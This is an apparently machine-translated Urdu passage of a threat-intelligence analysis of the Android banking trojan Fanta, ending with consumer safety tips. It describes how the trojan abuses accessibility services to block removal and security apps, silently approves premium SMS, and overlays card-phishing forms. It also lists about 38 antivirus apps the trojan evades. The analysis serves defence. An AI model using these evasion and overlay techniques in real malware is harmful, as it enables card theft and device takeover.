AccessibilityService کی فعالیت کا استعمال کرتے ہوئے، ٹروجن متاثرہ ڈیوائس کی سکرین پر عناصر میں ہونے والی تبدیلیوں کی نگرانی کرتا ہے۔ جیسا کہ پہلے بیان کیا گیا ہے، فانٹا سیٹنگز میں ایک پیرامیٹر ہوتا ہے جو ڈائیلاگ بکس کے ساتھ لاگنگ آپریشنز کے لیے ذمہ دار ہوتا ہے۔ پڑھیں ڈائیلاگ. اگر یہ پیرامیٹر سیٹ کیا جاتا ہے، تو اس پیکیج کے نام اور تفصیل کے بارے میں معلومات جس نے ایونٹ کو متحرک کیا ڈیٹا بیس میں شامل کیا جائے گا۔ ٹروجن مندرجہ ذیل اعمال انجام دیتا ہے جب واقعات کو متحرک کیا جاتا ہے:

درج ذیل صورتوں میں پچھلی اور گھر کی چابیاں دبانے کی نقل کرتا ہے:
· اگر صارف اپنے آلے کو ریبوٹ کرنا چاہتا ہے۔
· اگر صارف "Avito" ایپلیکیشن کو حذف کرنا چاہتا ہے یا رسائی کے حقوق کو تبدیل کرنا چاہتا ہے۔
· اگر صفحہ پر "Avito" ایپلیکیشن کا ذکر ہے۔
· گوگل پلے پروٹیکٹ ایپلیکیشن کھولتے وقت
· AccessibilityService کی ترتیبات کے ساتھ صفحات کھولتے وقت
· جب سسٹم سیکیورٹی ڈائیلاگ باکس ظاہر ہوتا ہے۔
· "دیگر ایپ پر ڈرا" کی ترتیبات کے ساتھ صفحہ کھولتے وقت
· "ایپلی کیشنز" کا صفحہ کھولتے وقت، "بازیافت اور دوبارہ ترتیب دیں"، "ڈیٹا ری سیٹ"، "ری سیٹ سیٹنگز"، "ڈیولپر پینل"، "خصوصی۔ مواقع"، "خصوصی مواقع"، "خصوصی حقوق"
· اگر واقعہ کچھ مخصوص ایپلی کیشنز کے ذریعہ تیار کیا گیا تھا۔

درخواستوں کی فہرست
- لوڈ، اتارنا Android
- ماسٹر لائٹ
- کلین ماسٹر۔
- x86 CPU کے لیے کلین ماسٹر
- Meizu درخواست کی اجازت کا انتظام
- MIUI سیکیورٹی
- کلین ماسٹر - اینٹی وائرس اور کیشے اور کوڑا صاف کرنے والا
- والدین کے کنٹرول اور GPS: Kaspersky SafeKids
- کاسپرسکی اینٹی وائرس ایپ لاک اور ویب سیکیورٹی بیٹا
- وائرس کلینر، اینٹی وائرس، کلینر (MAX سیکیورٹی)
- موبائل اینٹی وائرس سیکیورٹی پی آر او
- Avast اینٹی وائرس اور مفت تحفظ 2019
- موبائل سیکیورٹی میگا فون
- Xperia کے لیے AVG تحفظ
- موبائل سیکیورٹی
- Malwarebytes اینٹی وائرس اور تحفظ
- اینڈروئیڈ 2019 کے لیے اینٹی وائرس
- سیکیورٹی ماسٹر - اینٹی وائرس، وی پی این، ایپ لاک، بوسٹر
- Huawei ٹیبلیٹ سسٹم مینیجر کے لیے AVG اینٹی وائرس
- سام سنگ کی رسائی
- سام سنگ اسمارٹ مینیجر
- سیکیورٹی ماسٹر
- سپیڈ بوسٹر
- ڈاکٹر ویب
- ڈاکٹر ویب سیکیورٹی اسپیس
- ڈاکٹر ویب موبائل کنٹرول سینٹر
- Dr.Web Security Space Life
- ڈاکٹر ویب موبائل کنٹرول سینٹر
- اینٹی وائرس اور موبائل سیکیورٹی
- کاسپرسکی انٹرنیٹ سیکیورٹی: اینٹی وائرس اور تحفظ
- کاسپرسکی بیٹری لائف: سیور اور بوسٹر
- کاسپرسکی اینڈ پوائنٹ سیکیورٹی - تحفظ اور انتظام
- اے وی جی اینٹی وائرس فری 2019 – اینڈرائیڈ کے لیے تحفظ
- اینٹی وائرس لوڈ ، اتارنا Android
- نورٹن موبائل سیکیورٹی اور اینٹی وائرس
- اینٹی وائرس، فائر وال، وی پی این، موبائل سیکیورٹی
- موبائل سیکیورٹی: اینٹی وائرس، وی پی این، چوری سے تحفظ
- اینڈرائیڈ کے لیے اینٹی وائرس
اگر ایک مختصر نمبر پر ایس ایم ایس پیغام بھیجتے وقت اجازت طلب کی جاتی ہے تو، فانٹا چیک باکس پر کلک کرنے کی نقل کرتا ہے۔ انتخاب یاد رکھیں اور بٹن بھیجیں.
جب آپ ٹروجن سے منتظم کے حقوق چھیننے کی کوشش کرتے ہیں، تو یہ فون کی اسکرین کو مقفل کر دیتا ہے۔
نئے منتظمین کو شامل کرنے سے روکتا ہے۔
اگر اینٹی وائرس کی درخواست dr.web خطرے کا پتہ چلا، Fanta بٹن دبانے کی نقل کرتا ہے۔ نظر انداز کرنا.
ٹروجن بیک اور ہوم بٹن کو دبانے کی نقل کرتا ہے اگر ایونٹ ایپلیکیشن کے ذریعہ تیار کیا گیا ہو۔ سیمسنگ ڈیوائس کیئر.
اگر تقریباً 30 مختلف انٹرنیٹ سروسز کی فہرست سے کوئی ایپلیکیشن شروع کی گئی ہو تو Fanta بینک کارڈز کے بارے میں معلومات درج کرنے کے لیے فارم کے ساتھ فشنگ ونڈوز بناتا ہے۔ ان میں سے: AliExpress، بکنگ، Avito، Google Play Market Component، Pandao، Drom Auto، وغیرہ۔

فشنگ فارمز

فانٹا تجزیہ کرتا ہے کہ کون سی ایپلیکیشنز متاثرہ ڈیوائس پر چل رہی ہیں۔ اگر دلچسپی کی درخواست کھولی گئی ہے، تو ٹروجن دیگر تمام چیزوں کے اوپر ایک فشنگ ونڈو دکھاتا ہے، جو بینک کارڈ کی معلومات درج کرنے کا ایک فارم ہے۔ صارف کو درج ذیل ڈیٹا درج کرنا ضروری ہے:
- کارڈ نمبر
- کارڈ کی میعاد ختم ہونے کی تاریخ
- CVV
- کارڈ ہولڈر کا نام (تمام بینکوں کے لیے نہیں)
چل رہی ایپلیکیشن پر منحصر ہے، مختلف فشنگ ونڈوز ظاہر ہوں گی۔ ذیل میں ان میں سے کچھ کی مثالیں ہیں:

ایلئ ایکسپریس:

ایویٹو:

کچھ دیگر ایپلی کیشنز کے لیے، جیسے Google Play Market، Aviasales، Pandao، Booking، Trivago:

یہ واقعی کیسا تھا۔

خوش قسمتی سے، مضمون کے شروع میں بیان کردہ ایس ایم ایس پیغام وصول کرنے والا شخص سائبر سیکیورٹی کا ماہر نکلا۔ لہذا، اصل، غیر ڈائریکٹر کا ورژن پہلے بتائے گئے سے مختلف ہے: ایک شخص کو ایک دلچسپ ایس ایم ایس موصول ہوا، جس کے بعد اس نے اسے گروپ-IB تھریٹ ہنٹنگ انٹیلی جنس ٹیم کو دیا۔ حملے کا نتیجہ یہ مضمون ہے۔ ہیپی اینڈنگ، ٹھیک ہے؟ تاہم، تمام کہانیاں اتنی کامیابی سے ختم نہیں ہوتیں، اور اس لیے کہ آپ کی کہانی پیسے کے نقصان کے ساتھ کسی ڈائریکٹر کی کٹ کی طرح نہیں لگتی، زیادہ تر معاملات میں درج ذیل طویل بیان کردہ اصولوں پر عمل کرنا کافی ہوتا ہے:
- گوگل پلے کے علاوہ کسی دوسرے ذرائع سے Android OS والے موبائل ڈیوائس کے لیے ایپلیکیشنز انسٹال نہ کریں۔
- ایپلی کیشن انسٹال کرتے وقت، ایپلی کیشن کے ذریعہ درخواست کردہ حقوق پر خصوصی توجہ دیں۔
- ڈاؤن لوڈ فائلوں کی توسیع پر توجہ دیں۔
- باقاعدگی سے Android OS اپ ڈیٹس انسٹال کریں۔
- مشکوک وسائل کا دورہ نہ کریں اور وہاں سے فائلیں ڈاؤن لوڈ نہ کریں۔
- SMS پیغامات میں موصول ہونے والے لنکس پر کلک نہ کریں۔

ماخذ: www.habr.com

Leisya، Fanta: پرانے Android Trojan کے نئے حربے